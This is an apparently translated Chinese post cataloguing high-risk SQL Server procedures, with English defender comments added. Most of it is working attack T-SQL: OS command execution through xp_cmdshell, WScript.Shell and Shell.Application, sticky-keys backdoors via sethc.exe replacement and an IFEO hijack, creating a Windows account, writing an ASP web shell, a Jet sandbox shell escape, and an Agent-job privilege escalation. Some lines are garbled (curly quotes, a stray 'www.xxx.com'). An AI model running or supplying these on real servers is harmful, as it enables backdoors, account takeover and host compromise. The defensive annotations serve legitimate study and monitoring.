SQL 不常用的一些命令sp_OACreate,xp_cmdshell,sp_makewebtask

本文详细介绍了SQL Server中高危存储过程的使用方法,包括开启和关闭xp_cmdshell、sp_oacreate、sp_makewebtask及openrowset等,展示了如何通过这些过程执行系统命令、文件操作及远程数据访问,对于理解SQL Server的安全性和功能至关重要。


1.
开启和关闭xp_cmdshell
-- Enable / disable the xp_cmdshell server option.
-- 'xp_cmdshell' is an advanced option and is off by default, so each line first exposes
-- 'show advanced options'; RECONFIGURE applies the pending value. Changing it needs
-- ALTER SETTINGS (sysadmin / serveradmin) and is server-wide: the change is written to the
-- SQL Server error log ("Configuration option 'xp_cmdshell' changed ..."), which is the
-- place to alert on it.
-- NOTE(review): the quotes and the trailing "–" are typographic (‘ ’ and an en dash, not
-- ' and --) — as shown these lines do not parse; confirm against the original post.
EXEC sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’, 1;RECONFIGURE;– 开启xp_cmdshell
EXEC sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’, 0;RECONFIGURE;– 关毕xp_cmdshell
-- Hide advanced options again. GO is a client-side batch separator and must stand on its
-- own line; collapsed into the statement as here it is not valid T-SQL.
EXEC sp_configure ‘show advanced options’, 0; GO RECONFIGURE WITH OVERRIDE; 禁用advanced options

2.
xp_cmdshell执行命令
-- Runs an OS command through xp_cmdshell (master database). The command executes as the
-- SQL Server service account for sysadmin callers, or as the configured xp_cmdshell proxy
-- account otherwise; on the host it shows up as cmd.exe spawned by sqlservr.exe, which is
-- the usual detection anchor.
EXEC master..xp_cmdshell ‘ipconfig’

3.
开启和关闭sp_oacreate
-- Enable / disable 'Ole Automation Procedures', the option that gates sp_OACreate,
-- sp_OAMethod, sp_OAGetProperty, sp_OASetProperty and sp_OADestroy. Off by default; the
-- sp_OA* procedures also require sysadmin membership, and COM objects they create run
-- inside the sqlservr.exe process with the service account's rights.
-- Like the xp_cmdshell toggle, the change is recorded in the SQL Server error log.
exec sp_configure ‘show advanced options’, 1;RECONFIGURE;exec sp_configure ‘Ole Automation Procedures’,1;RECONFIGURE; 开启
exec sp_configure ‘show advanced options’, 1;RECONFIGURE;exec sp_configure ‘Ole Automation Procedures’,0;RECONFIGURE; 关毕
-- GO must be on its own line to act as a batch separator; collapsed here it is not valid.
EXEC sp_configure ‘show advanced options’, 0; GO RECONFIGURE WITH OVERRIDE; 禁用advanced options

4.
sp_OACreate删除文件
-- Deletes a file via the Scripting.FileSystemObject COM object (needs 'Ole Automation
-- Procedures' enabled and sysadmin rights). The file operation is performed by the SQL
-- Server service account, not the calling login — file-system ACLs on the service account
-- are the effective control.
DECLARE @Result int
DECLARE @FSO_Token int
-- @Result receives each call's HRESULT but is never inspected, so a failed create or
-- delete is silent; sp_OAGetErrorInfo @FSO_Token would surface the error text.
EXEC @Result = sp_OACreate ‘Scripting.FileSystemObject’, @FSO_Token OUTPUT
EXEC @Result = sp_OAMethod @FSO_Token, ‘DeleteFile’, NULL, ‘C:\Documents and Settings\All Users\「开始」菜单\程序\启动\user.bat’
-- Release the COM object.
EXEC @Result = sp_OADestroy @FSO_Token

5.
sp_OACreate复制文件
-- Copies explorer.exe over sethc.exe (the Sticky Keys helper in System32) through
-- FileSystemObject. From a defender's view this is a system-binary replacement performed
-- by the database service account: file-integrity monitoring of System32 and alerting on
-- sqlservr.exe writing into Windows directories both catch it.
declare @o int
-- 'out' is the short form of OUTPUT; @o receives the object token.
exec sp_oacreate ‘scripting.filesystemobject’, @o out
exec sp_oamethod @o, ‘copyfile’,null,’c:\windows\explorer.exe’ ,’c:\windows\system32\sethc.exe’;

6.
sp_OACreate移动文件
-- Renames/moves a file through FileSystemObject.MoveFile. Same prerequisites as the other
-- sp_oacreate examples ('Ole Automation Procedures' on, sysadmin); the move runs with the
-- SQL Server service account's permissions.
declare @aa int
exec sp_oacreate ‘scripting.filesystemobject’, @aa out
-- Return value (HRESULT) is discarded, so a failed move is not reported.
exec sp_oamethod @aa, ‘moveFile’,null,’c:\temp\ipmi.log’, ‘c:\temp\ipmi1.log’;

7.
sp_OACreate加管理员用户

-- Creates a local Windows account by having the ScriptControl COM object evaluate a
-- JavaScript snippet (Shell.Users). The page's heading describes the result as an
-- administrator account via AccountType=3; the meaning of 3 is not shown here — confirm.
-- Because the caller is the SQL Server service account, the creation appears as Windows
-- Security event 4720 with that account as the subject, which is the detection hook.
-- NOTE(review): MSScriptControl is a 32-bit-only component and is likely unavailable
-- inside a 64-bit sqlservr.exe — confirm.
DECLARE @js int
EXEC sp_OACreate ‘ScriptControl’,@js OUT
EXEC sp_OASetProperty @js, ‘Language’, ‘JavaScript’
EXEC sp_OAMethod @js, ‘Eval’, NULL, ‘var o=new ActiveXObject(“Shell.Users”);z=o.create(“user”);z.changePassword(“pass”,””);z.setting(“AccountType”)=3;’

8.
开启和关闭sp_makewebtask
-- Enable / disable 'Web Assistant Procedures' (sp_makewebtask and friends).
-- The Web Assistant was deprecated in SQL Server 2005 and removed in 2008, so this option
-- only exists on legacy instances; on current versions the sp_configure call fails.
exec sp_configure ‘show advanced options’, 1;RECONFIGURE;exec sp_configure ‘Web Assistant Procedures’,1;RECONFIGURE; 开启
exec sp_configure ‘show advanced options’, 1;RECONFIGURE;exec sp_configure ‘Web Assistant Procedures’,0;RECONFIGURE; 关毕
-- GO must be on its own line to act as a batch separator; collapsed here it is not valid.
EXEC sp_configure ‘show advanced options’, 0; GO RECONFIGURE WITH OVERRIDE; 禁用advanced options

9.
sp_makewebtask新建文件
-- sp_makewebtask writes the result of the given query to a file on the server's file
-- system (the Web Assistant's HTML export). Legacy only — removed in SQL Server 2008.
-- Any file it produces is written by the SQL Server service account, so write access to
-- web-served directories by that account is the thing to restrict and monitor.
exec sp_makewebtask ‘c:\windows.txt’,’ select ”<%25execute(request(“a”))%25>” ‘;;–

10.
wscript.shell执行命令
-- Runs an OS command through the WScript.Shell COM object instead of xp_cmdshell, so it
-- works while xp_cmdshell is disabled but 'Ole Automation Procedures' is on (sysadmin
-- still required). The child process is spawned by sqlservr.exe, which process-tree
-- monitoring catches the same way as xp_cmdshell.
use master
declare @o int
exec sp_oacreate ‘wscript.shell’,@o out
-- Output is redirected to a file because Run returns no stdout to the caller.
exec sp_oamethod @o,’run’,null,’cmd /c “net user” > c:\test.tmp’

11.
Shell.Application执行命令
-- Runs a program through Shell.Application.ShellExecute — a third command-execution path
-- alongside xp_cmdshell and WScript.Shell, with the same prerequisites ('Ole Automation
-- Procedures' on, sysadmin) and the same observable: a child process of sqlservr.exe.
declare @o int
exec sp_oacreate ‘Shell.Application’, @o out
-- Arguments: file, parameters, working directory, verb, window style.
exec sp_oamethod @o, ‘ShellExecute’,null, ‘cmd.exe’,’cmd /c net user >c:\test.txt’,’c:\windows\system32′,”,’1′;
-- The bare word below is prose ("or"), not T-SQL: the next line is an alternative call.
or
exec sp_oamethod @o, ‘ShellExecute’,null, ‘user.vbs’,”,’c:\’,”,’1′;

12.
开启和关闭openrowset
-- Enable / disable 'Ad Hoc Distributed Queries', which gates OPENROWSET / OPENDATASOURCE
-- with an inline connection string. Off by default; when on, any login that can run
-- OPENROWSET can reach arbitrary OLE DB providers from the engine process, so keep it
-- off unless a linked-server definition cannot do the job.
exec sp_configure ‘show advanced options’, 1;RECONFIGURE;exec sp_configure ‘Ad Hoc Distributed Queries’,1;RECONFIGURE; 开启
exec sp_configure ‘show advanced options’, 1;RECONFIGURE;exec sp_configure ‘Ad Hoc Distributed Queries’,0;RECONFIGURE; 关毕
-- GO must be on its own line to act as a batch separator; collapsed here it is not valid.
EXEC sp_configure ‘show advanced options’, 0; GO RECONFIGURE WITH OVERRIDE; 禁用advanced options

13.
沙盒执行命令
-- Lowers the Jet engine's SandBoxMode to 1 via xp_regwrite (sysadmin-only, writes HKLM),
-- then uses OPENROWSET with the Jet OLE DB provider to evaluate a query containing the VBA
-- shell() function. The trailing "默认为3" notes that the default value is 3.
-- Prerequisites visible from the surrounding sections: 'Ad Hoc Distributed Queries' on.
-- Defender notes: xp_regwrite calls and writes under HKLM\SOFTWARE\Microsoft\Jet are both
-- auditable; the provider runs in-process, so the command executes as the service account.
-- NOTE(review): Microsoft.Jet.OLEDB.4.0 is a 32-bit-only provider and is not loadable by a
-- 64-bit SQL Server — confirm the target architecture.
exec master..xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0\Engines’,’SandBoxMode’,’REG_DWORD’,1 默认为3
select * from openrowset(‘microsoft.jet.oledb.4.0′,’;database=c:\windows\system32\ias\ias.mdb’,’select shell(“cmd.exe /c echo a>c:\b.txt”)’)

14.
注册表劫持粘滞键
-- Writes a 'Debugger' value under Image File Execution Options for sethc.EXE with
-- xp_regwrite (sysadmin-only). IFEO Debugger values are a well-known persistence location;
-- registry value-set events on this key (e.g. Sysmon event 13) originating from
-- sqlservr.exe are the detection anchor.
-- The string literal wraps across two lines as displayed; this is how the page shows it.
exec master..xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution
Options\sethc.EXE’,’Debugger’,’REG_SZ’,’C:\WINDOWS\explorer.exe’;

15.
sp_oacreate替换粘滞键
-- Same FileSystemObject copy as section 5 (explorer.exe over sethc.exe), followed by a
-- second copy of the replaced sethc.exe into System32\dllcache. Both are writes to
-- protected Windows directories by the SQL Server service account — file-integrity
-- monitoring on System32 and dllcache is the control that catches this.
declare @o int
exec sp_oacreate ‘scripting.filesystemobject’, @o out
exec sp_oamethod @o, ‘copyfile’,null,’c:\windows\explorer.exe’ ,’c:\windows\system32\sethc.exe’;
-- Second object for the dllcache copy; the line below holds two statements collapsed onto one.
declare @oo int
exec sp_oacreate ‘scripting.filesystemobject’, @oo out exec sp_oamethod @oo, ‘copyfile’,null,’c:\windows\system32\sethc.exe’ ,’c:\windows\system32\dllcache\sethc.exe’;

16.
public权限提权操作
-- Creates, schedules and starts a SQL Server Agent job whose single T-SQL step runs
-- xp_cmdshell via xp_execresultset. Agent jobs execute under the SQL Server Agent service
-- account, so this is a way to reach xp_cmdshell with a different identity than the caller.
-- NOTE(review): the heading says "public" — on SQL Server 2005 and later, creating jobs
-- requires membership in one of the SQLAgent* roles in msdb (SQLAgentUserRole at least);
-- verify which versions the claim applies to.
-- Defender notes: new rows in msdb.dbo.sysjobs / sysjobsteps, Agent log entries, and
-- @delete_level = 1 (job removes itself after success) are the things to look for.
-- The "www.xxx.com" fragment on the sp_add_job line is a stray token, not SQL.
USE msdb
EXEC sp_add_job @job_name = ‘GetSystemOnSQL’, www.xxx.com
@enabled = 1,
@description = ‘This will give a low privileged user access to
xp_cmdshell’,
@delete_level = 1

-- Single T-SQL step; xp_execresultset is an undocumented procedure, semantics assumed.
EXEC sp_add_jobstep @job_name = ‘GetSystemOnSQL’,
@step_name = ‘Exec my sql’,
@subsystem = ‘TSQL’,
@command = ‘exec master..xp_execresultset N”select ””exec
master..xp_cmdshell “dir > c:\agent-job-results.txt””””,N”Master”’
-- 'SERVER_NAME' is a placeholder for the target instance name.
EXEC sp_add_jobserver @job_name = ‘GetSystemOnSQL’,
@server_name = ‘SERVER_NAME’
EXEC sp_start_job @job_name = ‘GetSystemOnSQL’

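-- Issues an HTTP GET from inside the database engine through the MSXML2.XMLHTTP COM
-- object and prints the response body.
-- Prerequisites: 'Ole Automation Procedures' enabled and sysadmin membership (sp_OA*).
-- The request is made by the SQL Server service account, so outbound HTTP from
-- sqlservr.exe is the observable side effect — and a useful egress-monitoring signal.
-- Every COM call returns an HRESULT in @HR; a non-zero value jumps to CLEANUP so the
-- object is always released by sp_OADestroy, and a create failure skips straight to
-- END_ROUTINE because there is nothing to release.
-- Fix: the "<>" operators of the IF checks had been stripped by HTML extraction, leaving
-- "IF @HR 0"; they are restored here. The unused @Property / @Return locals are dropped.
DECLARE @Object int;
DECLARE @HR int;
DECLARE @Source nvarchar(255), @Desc nvarchar(255);
DECLARE @httpStatus int;
DECLARE @response varchar(8000);

-- Create the OLE object instance.
EXEC @HR = sp_OACreate N'MSXML2.XMLHTTP.6.0', @Object OUT;
IF @HR <> 0
BEGIN
    EXEC sp_OAGetErrorInfo @Object, @Source OUT, @Desc OUT;
    RAISERROR('Error Creating COM Component 0x%x, %s, %s', 16, 1, @HR, @Source, @Desc);
    GOTO END_ROUTINE;
END

BEGIN
    -- open: the async flag is passed as the unquoted word FALSE, which T-SQL hands to the
    -- procedure as the string 'FALSE'; this relies on the COM layer coercing it — confirm.
    EXEC @HR = sp_OAMethod @Object, N'open', NULL, 'GET', 'http://localhost:1728/HttpServer/submit.aspx', FALSE;
    IF @HR <> 0
    BEGIN
        EXEC sp_OAGetErrorInfo @Object, @Source OUT, @Desc OUT;
        RAISERROR('Open 0x%x, %s, %s', 16, 1, @HR, @Source, @Desc);
        GOTO CLEANUP;
    END

    -- setRequestHeader
    EXEC @HR = sp_OAMethod @Object, N'setRequestHeader', NULL, 'Content-Type', 'text/xml';
    IF @HR <> 0
    BEGIN
        EXEC sp_OAGetErrorInfo @Object, @Source OUT, @Desc OUT;
        RAISERROR('setRequestHeader 0x%x, %s, %s', 16, 1, @HR, @Source, @Desc);
        GOTO CLEANUP;
    END

    -- send (empty body)
    EXEC @HR = sp_OAMethod @Object, N'send', NULL, '';
    IF @HR <> 0
    BEGIN
        EXEC sp_OAGetErrorInfo @Object, @Source OUT, @Desc OUT;
        RAISERROR('send 0x%x, %s, %s', 16, 1, @HR, @Source, @Desc);
        GOTO CLEANUP;
    END

    -- readyState: 4 means the synchronous request has completed.
    EXEC @HR = sp_OAGetProperty @Object, 'readyState', @httpStatus OUT;
    IF @HR <> 0
    BEGIN
        EXEC sp_OAGetErrorInfo @Object, @Source OUT, @Desc OUT;
        RAISERROR('readyState 0x%x, %s, %s', 16, 1, @HR, @Source, @Desc);
        GOTO CLEANUP;
    END
    IF @httpStatus <> 4
    BEGIN
        RAISERROR('readyState http status bad', 16, 1);
        GOTO CLEANUP;
    END

    -- status: anything but HTTP 200 is treated as a failure.
    EXEC @HR = sp_OAGetProperty @Object, 'status', @httpStatus OUT;
    IF @HR <> 0
    BEGIN
        EXEC sp_OAGetErrorInfo @Object, @Source OUT, @Desc OUT;
        RAISERROR('getstatus 0x%x, %s, %s', 16, 1, @HR, @Source, @Desc);
        GOTO CLEANUP;
    END
    IF @httpStatus <> 200
    BEGIN
        PRINT CAST(@httpStatus AS varchar);
        RAISERROR('Open http status bad', 16, 1);
        GOTO CLEANUP;
    END

    -- responseText: truncated to varchar(8000) by the declaration of @response.
    EXEC @HR = sp_OAGetProperty @Object, 'responseText', @response OUT;
    IF @HR <> 0
    BEGIN
        EXEC sp_OAGetErrorInfo @Object, @Source OUT, @Desc OUT;
        RAISERROR('responseText 0x%x, %s, %s', 16, 1, @HR, @Source, @Desc);
        GOTO CLEANUP;
    END
    PRINT @response;
END

CLEANUP:
BEGIN
    -- Release the COM object; report (but do not raise) a failure to destroy it.
    EXEC @HR = sp_OADestroy @Object;
    IF @HR <> 0
    BEGIN
        EXEC sp_OAGetErrorInfo @Object, @Source OUT, @Desc OUT;
        SELECT HR = CONVERT(varbinary(4), @HR), Source = @Source, Description = @Desc;
    END
END

END_ROUTINE:
RETURN;
GO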